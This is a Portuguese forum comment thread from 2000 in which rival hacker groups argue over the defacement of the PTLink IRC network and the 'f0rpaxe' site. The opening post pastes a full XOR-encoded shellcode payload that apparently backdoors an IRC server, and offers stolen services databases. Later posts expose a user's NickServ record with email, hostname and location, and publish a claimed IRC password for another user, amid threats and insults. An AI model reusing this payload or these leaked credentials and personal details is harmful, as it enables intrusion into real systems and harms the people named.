    Sim, usei um exploit já existente. Não tenho paciência ou necessidade para reinventar a roda. Além das expressões regulares que lhe passei por cima, só acrescentei um shellcodezito:
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x60\x02\x80\x36\x02\ x46\xe2\xfa" "\xeb\x8f\x03\x02\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92" "\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x76" "\x63\x70\x22\x7a\x64\x74\x78\x22\x2d\x6a\x6d\x6f\x67\x2d\x6b\x70\x61\x2d\x52" "\x56\x4e\x6b\x6c\x69\x2f\x37\x2c\x34\x2c\x32\x2c\x76\x63\x70\x2c\x65\x78\x02" "\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92" "\x92\x92\x92\x92\x92\x92\x72\x67\x70\x6e\x22\x2f\x72\x6b\x22\x2f\x67\x22\x25" "\x71\x2d\x4b\x71\x51\x67\x70\x74\x67\x70\x2a\x61\x72\x76\x70\x2b\x22\x7e\x7e" "\x22\x4b\x71\x4f\x67\x2a\x61\x72\x76\x70\x2b\x2b\x22\x24\x24\x22\x23\x4b\x71" "\x4d\x72\x67\x70\x2a\x71\x72\x76\x70\x2b\x2d\x4b\x71\x51\x67\x70\x74\x67\x70" "\x2a\x61\x72\x76\x70\x2b\x22\x7e\x7e\x22\x4b\x71\x4f\x67\x2a\x61\x72\x76\x70" "\x2b\x2b\x22\x7e\x23\x22\x71\x76\x70\x6c\x61\x6f\x72\x2a\x71\x72\x76\x70\x2f" "\x3c\x77\x71\x67\x70\x6c\x63\x6f\x67\x2e\x20\x64\x32\x70\x72\x63\x7a\x20\x2e" "\x71\x6b\x78\x67\x6d\x64\x2a\x20\x64\x32\x70\x72\x63\x7a\x20\x2b\x2b\x22\x24" "\x24\x22\x23\x4b\x71\x4d\x72\x67\x70\x2a\x71\x72\x76\x70\x2b\x2d\x65\x25\x22" "\x71\x70\x61\x2d\x71\x5d\x77\x71\x67\x70\x2c\x61\x02\x8f\xb6\x24\x02\x02\x02" "\x02\x8f\xbe\x25\x02\x02\x02\x02\x76\x63\x70\x22\x61\x64\x74\x78\x22\x2d\x6a" "\x6d\x6f\x67\x2d\x6b\x70\x61\x2d\x52\x56\x4e\x6b\x6c\x69\x2f\x37\x2c\x34\x2c" "\x32\x2c\x76\x63\x70\x2c\x65\x78\x22\x52\x56\x4e\x6b\x6c\x69\x2f\x37\x2c\x34" "\x2c\x32\x02\x2d\x6a\x6d\x6f\x67\x2d\x6b\x70\x61\x02\x76\x63\x70\x02\x2d\x6a" "\x6d\x6f\x67\x2d\x6b\x70\x61\x2d\x52\x56\x4e\x6b\x6c\x69\x2f\x37\x2c\x34\x2c" "\x32\x02\x2d\x77\x71\x70\x2d\x60\x6b\x6c\x2d\x72\x67\x70\x6e\x02\x2d\x6a\x6d" "\x6f\x67\x2d\x6b\x70\x61\x2d\x02\x83\xee\x65\x29\x02\x02\x57\x8b\xe7\x55\x54" "\x51\x81\xee\x1e\xea\x02\x02\x02\x02\x59\x83\xc1\x40\x13\x02\x02\x8f\x81\x3a" "\xef\xfd\xfd\x8b\x47\xea\x8f\x81\x7a\xef\xfd\xfd\x8b\x47\xe2\x8f\x81\x3a\xec" "\xfd\xfd\x8b\x47\xda\xc5\x47\xee\x02\x02\x02\x02\xc5\x47\xe6\x02\x02\x02\x02" "\xc5\x47\xde\x02\x02\x02\x02\x8f\xb1\x6e\xec\xfd\xfd\xba\x0e\x02\x02\x02\x51" "\x8b\xf1\xcf\x82\x33\xfd\x8f\xb1\x74\xec\xfd\xfd\x8f\x4f\xea\xba\x09\x02\x02" "\x02\x8b\xf8\x51\x8b\xf1\xcf\x82\x8f\xb1\x78\xec\xfd\xfd\xba\x0e\x02\x02\x02" "\x51\x8b\xf1\xcf\x82\x8f\xb1\x93\xec\xfd\xfd\x8f\x4f\xe2\xba\x09\x02\x02\x02" "\x51\x8b\xf1\xcf\x82\x8f\xb1\x9d\xec\xfd\xfd\xba\x0e\x02\x02\x02\x51\x8b\xf1" "\xcf\x82\x8f\xb1\x74\xec\xfd\xfd\x8f\x4f\xda\xba\x09\x02\x02\x02\x51\x8b\xf1" "\xcf\x82\x81\xc6\x1e\x59\x5c\x33\xc2\x5d\x5f\xc1\x92\x92\x92\x92\x92\x92\x92" "\x92\x92\x92\x92\x92";

    (translate at will. it's fun :-P)
    De qualquer maneira... O que interessa por onde se entrou? O facto é que a máquina tinha um buraco. O resto foi só alargar. Funcionou, não foi?

    F0rp4x3 (ou talvez não)

    P.S. - Se alguém estiver interessado nuns ficheiros chamados nick.db, oper.db, chan.db, que avise.
    Re:Como foi feito o deface da pagina dos forpaxe (Pontos:0)
    por Anonimo Cobarde em 13-10-00 7:51 GMT (#57)
    Isto e para justificar o deface da pagina do deface? :)))))))))))))))))))))
    Th4 Ptl1nk T34m ... (ou talvez nao)
    Re:Como foi feito o deface (Pontos:1)
    por humpback em 13-10-00 9:45 GMT (#58)
    (Utilizador Info)
    Isto de ler lamackaro (mistura de lamo com hackaro) tem muito que se lhe diga. Ao menos a equipa da Pt-Link pode com orgulho mostrar o seu nome/cara/trabalho. Enquanto voces todos se escondem por tras do que o GilDot tambem classifica como ANONIMO COBARDE!! Porque é isso que voces são, uma cambada de putos medrosos que acha que sao grandes por fazerem uns hacks. De voces não reza a historia, mas dos verdadeiros hackers (Linus, Stallman, Alan Cox etc, etc, etc) o mundo nunca se vai esquecer.
    Re:Como foi feito o deface (Pontos:0)
    por Anonimo Cobarde em 13-10-00 12:16 GMT (#61)
    um post pesado mas com *MUITA* verdade !... estes, nao kerem, nem podem ser conhecidos senao vao dentro... e tb uma rectificaçao... os putos medrosos *NAO* fazem hackz... usam exploitz... ora lah tah uma grande diferença... de RI nao entendem nada...
    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 13-10-00 13:24 GMT (#64)
    toda a gente sabe que aquela nao era a página dos f0rpaxe pois os f0rpaxe nao têm página porque se assim fosse já tinham ido dentro.. O grupo é completamente underground e ainda hoje me fazem rir ao insinuar que sao apenas um.. Pareçe que os pulhas ou lá quem foi que tentou imitar o JP da antionline, que só sabem fazer merda, enganaram-se e agora nao querem dar o braço a troçer... O hack tb nao foi do f0rpaxe pois por mais incrivel que pareça eles seguem um certo código ético. Os seus hacks tªem sempre um motivo quer politico ou outro qualquer. Neste caso nao houve motivo mas apenas uma tentativa de difamaçao dos kaotik etc..e quem era ´unico que o queria fazer? O wcPato é claro.. O maior skript kiddie de PT. Para já os f0rpaxe mostraram serem capazes de muito mais e nao é por qualquer razao que tiveram na boca de todo o mundo quer tenha sido con CF ou nao visto nada estar provado..Os f0rpaxe nao precisam de provar nada a ninguém e se ainda nao demonstraram o que realmente sao capazes é porque estao á espera da altura certa..Para além disso a ECOL foi a prova de que eles sabem penetrar em máquinas linux e por relatos dos admins aquilo foi muito bem feito. Digo isto porque sei de investigaçoes em curso por entidades policiais sobre o f0rpaxe..Isto tenho a certeza visto já ter desempenhado um papel na so called Portuguese Justice. Pois meninos..eis a verdade: o SIS e a PJ andam em cima deles e neste momento aposto que o sabem nao só porque recentemente informaçao que estava em segredo de justiça foi alvo de um misterioso ataque á rede do SIS donde esses proçessos foram copiados por supostos hackers whatever cuja assinatura subtil deixaram como f0rpaxe... Por razoes óbvias nao deixo aqui o meu nome no entanto aqueles com poder para isso podem confirmar tudo isto nas entidades que levam a curso as investigaçoes..Lá por os f0rpaxe estarem muito calmos estes dias nao quer dizer que nao andem por ai a fazer coisas que nao deviam e a PJ e o SIS sabem disso e é por isso que as investigaçoes cada vez tendem a ser mais aprofundadas, no entanto o SIS e a PJ nao tem capacidade para abranger todas as actividades do f0rpaxe e talvez seja por isso que um comunicado oficial tenha sido feito a entidades judiciais do estrangeiro especializadas nesta matéria. Concluindo todos os meninos deviam de acalmar e de deixar fazer coisas que nao devem pois isto é a sério.. Quanto a estas afirmaçoes pareçe-me que segunda feira o pessoal do meu trabalho vai sofrer com o que aqui foi dito mas nao sao voçes que dizem que a informaçao deve ser livre? Quanto ao wcPato que voçes falam ninguem tem conhecimento dele :) e apenas soube da sua existencia pelo gildot em threads prévios.. Cordialmente : Dr. APS***
    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 14-10-00 22:57 GMT (#87)
    pah eh normal ke nunca tenhas ouvido falar, o gajo eh um palhaço :)
    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 15-10-00 22:00 GMT (#91)
    É palhaço é palhaço..mas, ppl como vcs gostam de ir ao circo verem as minhas palhaçadas ;]

    regardz, wC!
    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 15-10-00 22:02 GMT (#92)
    Ya, o wC não tem mais q fazer senão flamar a KK :D
    rotfl
    Para todos os efeitos, o wC "Pato", quando vos quer foder, fode-vos ;P hihihi

    regardz, wC!
    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 15-10-00 23:15 GMT (#94)

    com essa cara de anormal a unica coisa q fodes e' a palma da tua mao


    Re:toda a gente sabe que... (Pontos:0)
    por Anonimo Cobarde em 15-10-00 23:45 GMT (#95)
    ai fodes-te, fodes-te...
    fodes-te quando alguem mandar os logs para a PJ, ai fodes-te mesmo.
    E olha que já faltou mais...
    Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 12:57 GMT (#62)
    Ó MINHA GRANDA BESTA.. que não tens outro nome.. já experimentas-te pelo menos abrir os ditos cujos????? ou a tua BESTIALIDADE chega ao ponto de não reparar que as bases de dados estão ENCRIPTADAS! Se já é mau ver gajos a falarem do que não sabem... GAJOs a falarem do que não têm é simplesmente ABSURDO! PS: imprime as DBs e enfia no cuzinho.. que é praticamnte o que podes fazer com elas!
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 13:05 GMT (#63)
    Oh minha grande avantesma ignorante... Há uma diferença entre "encriptado" e "em formato binário". Os *.db são hashes em formato binário; e adivinha só o que é que pode ser usado para lê-los...
    Acertaste! Os fabulosos PTLink Services! Disponíveis na freshmeat, sourceforge, e ptlink.net. É só compilar!

    F0rp4x3 (ou talvez não)

    P.S. - Mais algum imbecil quer mostrar até que ponto consegue dizer asneira?
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 13:58 GMT (#65)
    BAHAHAHAH!!! TENTA LA! Ve se te calas e paras de DIZER ASNEIRAS!! PS: As Distribuições Internas PTLink são DIFERENTES das que podes encontrar em todos esses sites.. ó minha granda BESTA!
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 14:45 GMT (#66)
    -NickServ(Services@f0rpax.org)- lamego is * I'm to lame to read BitchX.doc * -NickServ(Services@f0rpax.org)- Ultimo endereco: lamego@ool-18bf6427.dyn.optonline.net -NickServ(Services@f0rpax.org)- Data de registo: 15 Abr 10:09:45 1999 GMT [Ha' 547 dia(s), 6 hora(s), 25 minuto(s) e 24 segundo(s)] -NickServ(Services@f0rpax.org)- Ultima vez identificado: 11 Out 08:30:36 2000 GMT [Ha' 2 dia(s), 8 hora(s), 4 minuto(s) e 33 segundo(s)] -NickServ(Services@f0rpax.org)- Ultima vez visto: 11 Out 09:06:04 2000 GMT [Ha' 2 dia(s), 7 hora(s), 29 minuto(s) e 5 segundo(s)] -NickServ(Services@f0rpax.org)- Tempo total online: 16 dia(s), 14 hora(s), 29 minuto(s) e 11 segundo(s). -NickServ(Services@f0rpax.org)- Ultima mensagem de quit: Quit: babye work -NickServ(Services@f0rpax.org)- E-mail: Lamego@PTlink.net -NickServ(Services@f0rpax.org)- Local: Setúbal -NickServ(Services@f0rpax.org)- Opcoes: Nenhuma -NickServ(Services@f0rpax.org)- Cancelamento do registo: nunca -NickServ(Services@f0rpax.org)- Lista de nicks ligados ao nick Lamego: -NickServ(Services@f0rpax.org)- 0 nicks ligados.

    Tou a ver... Estão encriptadíssimas... Nice hostname, labrego!
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 15:20 GMT (#67)
    Tu deves ser mesmo BESTA.. A UNICA INFORMAÇÂO QUE ESTA ENCRIPTADA É A SENSIVEL!! PASSWORDS!!!! LOL.. Se querias um nickserv info.. faz /Server irc.ptlink.net que é MUITO MAIS RAPIDO.. ainda andam estes gajos a fazer-me perder TEMPO!
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 16:29 GMT (#68)
    /nickserv info lamego
    -NickServ- lamego e' * I'm to lame to read BitchX.doc *
    -NickServ- Data de registo: Apr 15 10:09:45 1999 GMT [Ha' 547 dia(s), 7 hora(s), 19 minuto(s) e 50 segundo(s)]
    -NickServ- Ultima vez identificado: Oct 13 15:17:44 2000 GMT [Ha' 2 hora(s), 11 minuto(s) e 51 segundo(s)]
    -NickServ- Ultima vez visto: Oct 13 15:58:25 2000 GMT [Ha' 1 hora(s), 31 minuto(s) e 10 segundo(s)]
    -NickServ- Tempo total online: 17 dia(s), 0 hora(s), 56 minuto(s) e 54 segundo(s).
    -NickServ- Ultima mensagem de quit: Quit: xau
    -NickServ- E-mail: Lamego@PTlink.net
    -NickServ- Local: Setúbal
    -NickServ- Opcoes: Nenhuma

    O tipo tem razao ... de facto o Info funciona ... nao ves e' tudo (last IP address por exemplo).
    Acho que quem 'disponibilizou' os .db's so' quiz provar que os tinha ... e que sao legiveis :-)

    Nao entendo uma coisa de um dos teus posts: a PTlink tem uma versao GPL (e publica) dos 'seus' servers/services ... e OUTRA para uso 'interno' ????
    Isso levanta umas questoes pertinentes ... mas deixo isso para a vossa imaginacao :-)
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 17:05 GMT (#69)

    nada disso. e' AGPL - ALMOST GNU GENERAL PUBLIC LICENSE


    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 17:10 GMT (#70)
    Que os tem.. ninguem tem duvidas.. agora que nao os pode utilizar com qualquer fim malacioso tb ja sabemos.. a questão é.. qual é BESTA.. que se vem vangloriar de algo que de lhe nada serve!!!? Se ainda podesse tirar as passwords.. mas nem isso!
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:1)
    por jig em 13-10-00 17:18 GMT (#71)
    (Utilizador Info)
    Não . Isso é falso.Eu quando quero fazer upgrade do ircd (por exemplo) vou a pagina e saco,compilo e instalo.
    Eu e qualquer outro ircadmin/op da ptlink.
    Não comecem com paranoias.PTlink!=PTnet

    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 18:28 GMT (#72)
    Isso quer dizer que internamente usam o mesmo algoritmo baseado em XOR para "encriptar" as passwords? Óptimo.
    Re:Quem quer o nick.db? Oper.db? ui.. (Pontos:0)
    por Anonimo Cobarde em 13-10-00 18:59 GMT (#74)
    Não minha Besta.. é exactamente isso que se esta a dizer desde o inicio.. que é utilizado, internamente, um algoritmo completamente diferente. XUPA-MOS!
    Anonimo Cobarde (Pontos:1)
    por humpback em 13-10-00 18:40 GMT (#73)
    (Utilizador Info)
    Quem é esse cromo do Anonimo Cobarde que está a encher esta thread de spam?
    Re:Anonimo Cobarde (Pontos:0)
    por Anonimo Cobarde em 13-10-00 19:14 GMT (#75)
    pah nao sei mas eu nao fui... foi outro =)
    Re:Anonimo Cobarde (Pontos:0)
    por Anonimo Cobarde em 13-10-00 23:49 GMT (#82)
    anonimo quem ??'
    Re:Anonimo Cobarde (Pontos:0)
    por Anonimo Cobarde em 14-10-00 0:20 GMT (#83)
    eh pá, registem-se. os posts anónimos são estúpidos. eheh
    Re:Anonimo Cobarde (Pontos:0)
    por Anonimo Cobarde em 14-10-00 17:14 GMT (#86)
    ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ ----------------------------------------------------------------------------------- + ---------------------------------------------------------------------------------- -------------------------------------------------------------------------------------- ----------------------- MERDA --------------------------------------------------- Por isso -------------------------------------------------------------------------------- Hack e irc misturados dão -------------------------------------------------------------- Muitas dôres de cabeça ----------------------------------------- sign off ...
    somos todos lites (Pontos:0)
    por Anonimo Cobarde em 15-10-00 12:18 GMT (#88)
    nick : wildcoyote
    password : qyjazuru

    agora procurem a que serve isto :)
    Re:somos todos lites (Pontos:0)
    por Anonimo Cobarde em 15-10-00 17:48 GMT (#89)
    heh, wC here..

    na sei para q foi isso :]
    since q a minha pass nao é essa, e nunca foi ;) até vos digo a pass da ptlink se quiserem, pouko me importa quem usa o meu nick numa rede de brincar *g*
    de qualquer forma, as passes q lá costumo usar, since q nao confio nos admins/opers da ptlink, costuma ser stuff like "puta_q_pariu_a_ptlink", "vai_te_foder_admin_de_merda" stuff like that ;)

    por isso, nao sei onde foram buscar isso :], mas, tá-se ;)

    regardz, wC!
    Re:somos todos lites (Pontos:0)
    por Anonimo Cobarde em 15-10-00 22:30 GMT (#93)
    ponto 1 : se eu meti a pass eh porke ela existe e eh tua !
    ponto 2 : tu NAO dizes ke a passe nao eh tua !
    ponto 3 : 1 0wn j00 !
    ponto 4 : nao pertenço ah rede e tou a cagar proh ka pensas dela, tu eh ke tahs na linha de mira !
    ponto 5 : As tuas shellz sao minhas.
    ponto 6 : Os bots dos teus amigos sao meus.
    ponto 7 : Por onde tu andas eu passo sem veres !
    ponto 8 : Continuas a armar.te em calhau e continuo a meter as tuas passes todas de tudo !
    ponto 9 : Sabes bem onde eu fui buscar a pass, tua, x-raver, [medusa] e o kamano...
    ponto A : tah.se bem, tah.se... mas nao tu... eu sim :]
    ponto B : ve se desapareces ke tou farto de ti !
    ponto C : kem se porta mal vai dentro.
    ponto D : deves ser muita adepto do open source (assim jah podes copiar ah vontade programas e meter o teu nome nos comments)
    ponto E : o hex tah a acabar.
    ponto F : acabou.se aki mesmo :]

    Have nice dreams madafaka, because i.me right behind you :]

    Re:somos todos lites (Pontos:0)
    por Anonimo Cobarde em 19-10-00 1:30 GMT (#101)
    Ui...isto tá uindo :))
    Vamos lá começar...

    1) Por essa logika, se eu digo que tu és 1 fdp, é pq a tua velha é puta =) e tamos conversados..
    2) Eu digo q a pass não é minha :))
    3) sure you do...
    4) Estou na mira? Go ahead, shoot...
    5) Nah nah, isto tá mal feito! :| vens com a lógika do "Oq é meu, é MEU! oq é teu é NOSSO!" assim na pode ser :((
    6) hmm, amigos com bots, hmm, oh k :) sugestão tomada! =) mas...continuam a ser "nossos"! :]
    7) Até quando eu estou na casa de banho? :( e a tomar banho? e a masturbar-me?! ve lá pah..não te quero deixar envergonhado :) *shy*
    8) Go ahead, eu nem ameaçava, fazia logo :) alias, pq eu só costumo usar uma pass "universal", fora as outras para shitty stuff :] mas...sério dewd =) não ameaçes, eu desafio! :****
    9) Não imagino do que estejas a falar :) falaste num tal de "kamano" or something, isso é suposto ser 1 nick? não conheço :) e...whatever! estou a ver q conheces o ppl com q eu costumo falar *g*
    A) Pronto, leva lá a bicicleta preto :)
    B) Não estou na mira? :) Faz-me desaparecer *shy*
    C) No entanto eu estou cá fora :) ,ou seja, eles ou têm pena de mim, ou..eu sou muito bem comportado =))
    D) off course, e...mesmo assim, vejo-me phucked pra postar tanto code :] é preciso ter requinte, ser original para mudar apenas o meu nick nos comments :) hehe, deves ter 1 database cheia de code "meu" [rippado, é claro :)]
    E) Finalmente...
    F) No entanto, continuas a só ter merda nessa cabeça :))

    E assim concluimos, as explicações por hoje! :)
    Amanhã há mais! =)

    ps: gostei do toke "subtil" de inveja'espalhado por todo o post :], sério, curti, dá-lhe força nisso jovem! ;)

    regardz, wC!
    Bubixamos.News.For.Elite.Hackerz (Pontos:0)
    por Anonimo Cobarde em 15-10-00 18:11 GMT (#90)
    Leiam e just LOL IT!!!! :)

    BubIx lamerz:
    http://www.bubix.net/stories.php?story=00/10/12/7967485
    http://www.bubix.net/stories.php?story=00/10/12/6868341
    http://www.bubix.net/~bubix/hacked/ptlink/ptlink.htm
    http://hp.bubix.net/~bubix/hacked/forpaxe/forpaxamos.htm
    Será que isto foi tudo uma grande fantochada ou não?
    Re:Bubixamos.News.For.Elite.Hackerz (Pontos:0)
    por Anonimo Cobarde em 16-10-00 11:11 GMT (#96)
    define o que entendes por fantochada
    Re:Bubixamos.News.For.Elite.Hackerz (Pontos:1)
    por Venereo em 16-10-00 13:25 GMT (#97)
    (Utilizador Info)
    k talvez os forpaxadores n tenham feitu soh um hack ;)
    Ph0bic Lhamu!!! (Pontos:0)
    por Anonimo Cobarde em 16-10-00 16:51 GMT (#98)
    Se bem se lembram este cromo tem foto na net. http://members.tripod.com/Ph0bic_ownz/ :)))))
    Re:Ph0bic Lhamu!!! (Pontos:0)
    por Anonimo Cobarde em 17-10-00 15:47 GMT (#99)
    a tua mae tambem tem :] www.sex.com www.tudo.nu :)))))
    Re:Ph0bic Lhamu!!! (Pontos:1)
    por Venereo em 17-10-00 20:23 GMT (#100)
    (Utilizador Info)
    muahahah i pelos vistus foi no melhor perfil dela

     

     

    [ Topo | FAQ | Editores | Contacto ]